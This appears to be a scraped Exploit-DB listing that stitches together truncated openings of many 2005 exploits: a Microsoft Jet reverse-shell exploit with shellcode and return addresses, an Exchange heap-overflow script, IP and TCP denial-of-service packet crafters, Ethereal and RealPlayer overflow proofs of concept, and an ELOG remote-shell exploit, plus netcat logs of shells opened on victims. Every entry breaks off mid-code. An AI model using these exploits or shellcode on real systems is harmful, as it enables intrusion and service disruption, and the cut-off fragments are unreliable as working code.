# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
exploitdb·2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB
Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection
exploitdb·2005-04-19
CVE-2005-1191 Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection
Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection
---
source: https://www.securityfocus.com/bid/13248/info
Microsoft Windows Explorer is prone to a script injection vulnerability. This occurs when the Windows Explorer preview pane (Web View) is enabled on Windows 2000 computers. Windows 98/98SE/ME are also affected by this issue. If a file with malicious attributes is selected using Explorer, script code contained in the attribute fields may be executed with the privilege level of the user that invoked Explorer. This could be exploited to gain unauthorized access to the vulnerable computer in the context of the currently logged in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-1.doc
https://gitlab.com/exploit-database/expl
Exploit-DB
Microsoft Exchange Server - Remote Code Execution (MS05-021)
exploitdb·2005-04-19
CVE-2005-0560 Microsoft Exchange Server - Remote Code Execution (MS05-021)
Microsoft Exchange Server - Remote Code Execution (MS05-021)
---
#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";
my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\xD5\x01" .
"\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x5F" .
"\x0C\x59
Exploit-DB
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
exploitdb·2005-04-16
CVE-2005-0048 Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
---
// source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
/* ecl-winipdos.c - 16/04/05
* Yuri Gushin
* Alex Behar
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are a
Exploit-DB
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
exploitdb·2005-04-12
CVE-2005-0048 Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
---
source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
#!/usr/bin/perl
use strict;
use warnings;
my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};
use Net::Pkt;
$Env->debug(3);
my $frame = Net::Packet::Frame->new(
l3 => Net::Packet::IPv4->new(
dst => $opts{t},
options => "\x03\x27". 'G'x38,
),
l4 => Net::Pack
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
Exploit-DB
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
exploitdb·2005-03-17
CVE-2005-0803 Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
---
source: https://www.securityfocus.com/bid/12834/info
Reportedly, a denial of service vulnerability affects Microsoft Windows GDI library 'gdi32.dll'. This issue is due to a failure of the application to securely copy data from malformed EMF image files.
An attacker may leverage this issue to trigger a denial of service condition in software implementing the vulnerable library. Other attacks may also be possible.
A hex dumped EMF file:
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 0
Exploit-DB
Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
exploitdb·2005-03-12
CVE-2005-0739 Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
---
/*
*
* Ethereal IAPP remote buffer overflow #2 PoC exploit
* ---------------------------------------------------
* To test this vulnerability on windows, try to send 3-10 packets
* that will trigger the crash, and scroll between captured packets
* in Ethereal.
*
* Coded by Leon Juranic
* LSS Security
*
*/
#include
#include
#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0
typedef struct _e_iapphdr {
unsigned char ia_version;
unsigned char ia_type;
} e_iapphdr;
typedef struct _e_pduhdr {
unsigned char pdu_type;
unsigned char pdu_len_h;
unsigned char pdu_len_l;
} e_pduhdr;
void xp_sendpacket (char *pack)
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
int sock,i;
struct sockaddr_in sin;
unsigned char buf[2000]
Exploit-DB
RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
exploitdb·2005-03-07
CVE-2005-0455 RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
---
/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses a seh overwrite method, which takes advantage of the SEH being placed
in multiple locations over the different OS's. Because of this, it should be
completely universal. :).
Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in.
C:\tools>nc -vv SERVER 1554
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Real\RealPlayer>
*/
#include
#include
#include
char pre[]=
"\n"
" \n"
" \n"
" \n"
" \n"
" \n"
" \n"
" "
"";
char ove
Exploit-DB
ELOG 2.5.6 - Remote Shell
exploitdb·2005-02-09
CVE-2005-0439 ELOG 2.5.6 - Remote Shell
ELOG 2.5.6 - Remote Shell
---
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBAC
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/***
ROSE attack (
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/*-----------------
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/***
ROSE attack (c
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/*----------------
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111885787217807&w=2http://www.gulftech.org/?node=research&article_id=00082-06142005http://www.phparena.net/http://www.phparena.net/pafiledb_patch/http://marc.info/?l=bugtraq&m=111885787217807&w=2http://www.gulftech.org/?node=research&article_id=00082-06142005http://www.phparena.net/http://www.phparena.net/pafiledb_patch/
2005-06-15
Published